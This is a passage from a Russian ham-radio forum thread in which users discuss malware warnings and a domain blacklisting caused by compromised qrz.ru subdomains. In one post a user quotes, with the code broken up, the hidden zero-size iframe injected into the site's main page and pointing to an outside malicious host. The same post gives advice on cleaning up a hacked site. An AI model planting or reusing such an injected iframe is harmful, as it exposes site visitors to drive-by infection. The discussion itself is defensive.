Страница 13 из 19 ПерваяПервая ... 3678910111213141516171819 ПоследняяПоследняя
Показано с 181 по 195 из 278
Like Tree14Спасибо

Тема: Вирусы на qrz.ru

  1. #181
    Silent Key
    Регистрация
    25.01.2008
    Адрес
    Донецк
    Возраст
    72
    Сообщений
    2,257
    Поблагодарили
    574
    Поблагодарил
    238
    Цитата Сообщение от RW3VZ Посмотреть сообщение
    А замеченная зараза на домашних страничках пользователей - это их забота
    Их забота, а проблемы то ваши? Народ всполошился, неделями антивирями компы сканируют.

    Добавлено через 5 минут
    Цитата Сообщение от UX0IM Посмотреть сообщение
    каждый день после захода делаю глубокую проверку всего компа разными антивирями...ничего!
    Интернет ресурсы имеют свои антивири...обнаружили трояны на этом сайте и блокируют доступ к нему.Это забота о наших компах, и наши антивири пока курят в сторонке..отдыхают

  2. #182
    ИТ/ИБ сервис инженер Аватар для RC3C
    Регистрация
    07.04.2002
    Адрес
    г.Москва, г.Троицк
    Возраст
    47
    Сообщений
    8,887
    Записей в дневнике
    8
    Поблагодарили
    2265
    Поблагодарил
    6940
    Цитата Сообщение от RX3DU Посмотреть сообщение
    Парни, ну просветите "чайника" , захожу на сайт каждый день (бывает по нескольку раз), никаких проблем ..тьфу-тьфу , почему эта грязь к одним липнет, к другим нет? ОС- Виста, Опера, Eset Smart Security. Кстати, когда были проблемы на CQ.HAM, у меня тоже никаких проблем не возникло.
    Видимо Опера не давала выполнить некий вирусный скрипт(программый код встроенный в тело сайта) после захода на сайт. Такое бывает.

  3. #183
    Very High Power Аватар для UA5AA
    Регистрация
    16.04.2005
    Адрес
    Moscow_Лось
    Возраст
    71
    Сообщений
    2,321
    Поблагодарили
    334
    Поблагодарил
    217
    ...вот тока щаз сработал Аваст - блокировал подключение к QRZ-ту.Сделал быструю проверку Вебом, Каспером и Авастом - ничего ..."тихо".

  4. #184
    Standart Power
    Регистрация
    26.12.2006
    Адрес
    Москва, Россия
    Возраст
    89
    Сообщений
    248
    Поблагодарили
    22
    Поблагодарил
    2
    На QRZ в день раз по сто захожу, а всё никак не словлю ничего. Стоит XP SP3 со всеми обновлениями+Каспер6+Outpost Fireval Pro 2009. Браузер- IE7. Что хоть делать надо, чтобы увидеть то, что здесь обсуждается?
    Или, я уже ужасно инфицирован, а об этом не знаю?

  5. #185
    Very High Power Аватар для RA6XTD
    Регистрация
    18.09.2007
    Адрес
    Нальчик, Кабардино-Балкария
    Возраст
    43
    Сообщений
    1,223
    Поблагодарили
    209
    Поблагодарил
    112
    Цитата Сообщение от RW3VZ Посмотреть сообщение
    А замеченная зараза на домашних страничках пользователей - это их забота.
    Да нет, вы не правы.
    Как раз из-за "их забот" ВЕСЬ домен qrz.ru попадает в черные списки.
    Оттого куча неудобств пользователям.

    Например тем, кто работает под Mozilla Firefox.

    Добавлено через 1 минуту
    Цитата Сообщение от Игорь 2 Посмотреть сообщение
    На QRZ в день раз по сто захожу, а всё никак не словлю ничего
    Дело в том, что заражены бывают поддомены 3-го уровня, сидящие на qrz.ru на которые вы не ходите.

  6. #186
    Low Power
    Регистрация
    19.11.2009
    Адрес
    Североуральск
    Возраст
    66
    Сообщений
    87
    Поблагодарили
    39
    Поблагодарил
    44
    Цитата Сообщение от Игорь 2 Посмотреть сообщение
    Что хоть делать надо, чтобы увидеть то, что здесь обсуждается?
    И я хочу, ну никак ничего плохого не вижу. Вот досадно то как.....

  7. #187
    Very High Power Аватар для RA6XTD
    Регистрация
    18.09.2007
    Адрес
    Нальчик, Кабардино-Балкария
    Возраст
    43
    Сообщений
    1,223
    Поблагодарили
    209
    Поблагодарил
    112
    Цитата Сообщение от RX3DU Посмотреть сообщение
    Парни, ну просветите "чайника" , захожу на сайт каждый день (бывает по нескольку раз), никаких проблем ..тьфу-тьфу , почему эта грязь к одним липнет, к другим нет? ОС- Виста, Опера, Eset Smart Security. Кстати, когда были проблемы на CQ.HAM, у меня тоже никаких проблем не возникло.
    Вы не путайте, когда ваш компьютре УЖЕ заразился и две другие ситуации:
    - антивирус блокирует вредоносный код на html страничке
    - доменное имя попало в черные списки различных сервисов в Интернете т.к. на сайтах поддоменов содержались странички с вредоносным кодом.

    Вот сейчас ситуация последняя. Из-за влома некоторых поддоменов, сидящих на qrz.ru (типа ua9lak.qrz.ru) весь домен попал в черные списки. Поэтому браузеры типа Mozilla Firefox, Opera ругаются на любой поддомен домена qrz.ru как на ПОТЕНЦИАЛЬНО опасный. Что затрудняет работу.

    Никто не говорит, что СЕЙЧАС зайдя на forum.qrz.ru можно что-то подхватить.

  8. #188
    Standart Power
    Регистрация
    26.12.2006
    Адрес
    Москва, Россия
    Возраст
    89
    Сообщений
    248
    Поблагодарили
    22
    Поблагодарил
    2
    Цитата Сообщение от RA6XTD Посмотреть сообщение
    Дело в том, что заражены бывают поддомены 3-го уровня, сидящие на qrz.ru на которые вы не ходите.
    А как туда сходить, я в сетевых делах дуб?

  9. #189
    Very High Power Аватар для RA6XTD
    Регистрация
    18.09.2007
    Адрес
    Нальчик, Кабардино-Балкария
    Возраст
    43
    Сообщений
    1,223
    Поблагодарили
    209
    Поблагодарил
    112
    Цитата Сообщение от Игорь 2 Посмотреть сообщение
    А как туда сходить, я в сетевых делах дуб?
    Хочется проверить насколько ваш "секс" будет защищенным?

    Спросите у тех, кто тут писал про ругань антивиров и брандмауэров во время посещения этих страничек. На какие именно поддомены они ходили.

  10. #190
    Very High Power Аватар для RT8L
    Регистрация
    03.11.2006
    Адрес
    MO27 - KN84
    Возраст
    63
    Сообщений
    4,330
    Поблагодарили
    1918
    Поблагодарил
    495
    Цитата Сообщение от RW3VZ Посмотреть сообщение
    Проблема была замечена еще до открытия этой ветки форума.
    Разбираемся.
    Конструктивные предложения приветствуются.

    А замеченная зараза на домашних страничках пользователей - это их забота.

    Заходил с нескольких компов на QRZ.RU и во всех случаях идет предупреждение о наличии вируса на сайте. Так, что причина не в пользователях.

    Надо бы навести порядок однако....

  11. #191
    Наблюдатель Аватар для R9LZ
    Регистрация
    29.07.2005
    Адрес
    Тюмень, Россия
    Возраст
    66
    Сообщений
    3,080
    Поблагодарили
    892
    Поблагодарил
    113
    Цитата Сообщение от RV9LR Посмотреть сообщение
    Надо бы навести порядок однако....
    Спасибо что подсказал о необходимости действий, доложусь тебе первому.

  12. #192
    High Power Аватар для RA9JM
    Регистрация
    16.11.2006
    Адрес
    Нижневартовск, Россия
    Возраст
    68
    Сообщений
    740
    Поблагодарили
    223
    Поблагодарил
    11
    Цитата Сообщение от RX3AGD Посмотреть сообщение
    ну что же админы то молчат?? давайте ребятки,занимайтесь уже делом!!!
    даааа,не ожидал...банить,предупреждения там разные(по своему усмотрению!!!!!т.е. по своим законам непонятным) это вам полегче будет!!
    А вот вам: "Лучше туда не ходить! :-)))))))))))
    Я ( и куча народу) уже поимели проблемы с баннером сексуального характера!
    Серега Илюхин UA9OTY в отпуске, и видать без него как без рук!
    73! Александр Сухарев RO9O"

  13. #193
    Very High Power
    Регистрация
    07.08.2005
    Адрес
    Москва
    Возраст
    52
    Сообщений
    1,298
    Поблагодарили
    374
    Поблагодарил
    613
    Цитата Сообщение от RA9JM Посмотреть сообщение
    А вот вам: "Лучше туда не ходить! :-)))))))))))
    Я ( и куча народу) уже поимели проблемы с баннером сексуального характера!
    Серега Илюхин UA9OTY в отпуске, и видать без него как без рук!
    73! Александр Сухарев RO9O"
    чаво сказать то хотели? смысел не понятен...

  14. #194
    Very High Power Аватар для RX3QFY
    Регистрация
    25.03.2009
    Адрес
    Эртиль, Воронежская обл., Россия
    Возраст
    53
    Сообщений
    1,864
    Записей в дневнике
    5
    Поблагодарили
    1015
    Поблагодарил
    682
    Цитата Сообщение от RW3VZ Посмотреть сообщение
    Конструктивные предложения приветствуются.
    На фтп к UA9LAK пустите? Помогу реально.

  15. #195
    Standart Power Аватар для 4Z5LZ / RA9APZ
    Регистрация
    28.05.2002
    Адрес
    г.Модиин
    Возраст
    49
    Сообщений
    304
    Поблагодарили
    18
    Поблагодарил
    21
    Цитата Сообщение от RW3VZ Посмотреть сообщение
    Конструктивные предложения приветствуются.
    Если требуются конструктивные предложения, то могу могу посоветовать один из методов выявления зараженных страниц (уверен, что 9OTY знает об этом, но может быть будет кому-то ещё полезно).

    Итак, как я вижу, на главной странице qrz.ru до сих пор находится эксплоит < iframe src="http : // trfistc.info /for.cgi?009" width="0" height="0" style="visibility: hidden;" >< /iframe >. Сейчас он бездействует, т.к. адрес указанный выше выдаёт ERROR 403: Forbidden. Поэтому антивирусы прекратили "кричать", хотя в Google видят этот код и не снимают бан с домейна.
    Видать хакеры приостановили свою черную деятельность. Но наверняка временно.

    У меня когда-то были подобные проблемы с коммерческими сайтами. Я сделал следующее. Я не стал сразу удалять вредоносный код, а посмотрел на дату последнего изменения файла в котором находится хакерский код. Если файл не был изменён автором сайта после внедрения эксплоита, то по дате можно искать в логах веб сервера (а также ftp и ssh) кем был внесён этот код. По найденным данным (в частности по IP хакера) можно найти и другие пораженные страницы на сайте и вычистить их.

    Труднее всего найти дырки, через которые хакеры пролезли, и если дыры не найдены, то необходимо поменять пароли к базе данных, ФТП и другим сервисам сайта, а также произвести апдейты программ типа форумов. Как правило, дыры находят в популярных программах с открытым кодом.

    Кстати, надо убрать упоминания о серверных компонентах со страниц сайта. Так например, в HTML можно увидеть
    "Powered by Apache 1.3.33 Unix web server + MySQL 4.1 server"
    Кому это надо? Правильно, хакерам.

    Добавлено через 2 минуты
    Цитата Сообщение от RX3QFY Посмотреть сообщение
    На фтп к UA9LAK пустите? Помогу реально.
    боюсь, ФТП будет недостаточно. см. мой коммент выше

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Похоже, что вы используете блокировщик рекламы :(
Форум QRZ.RU существует только за счет рекламы, поэтому мы были бы Вам благодарны если Вы внесете сайт в список исключений!
как отключить
×
Рейтинг@Mail.ru
eXTReMe Tracker


Похоже, что вы используете блокировщик рекламы :(
Форум QRZ.RU существует только за счет рекламы, поэтому мы были бы Вам благодарны если Вы внесете сайт в список исключений!
как отключить
×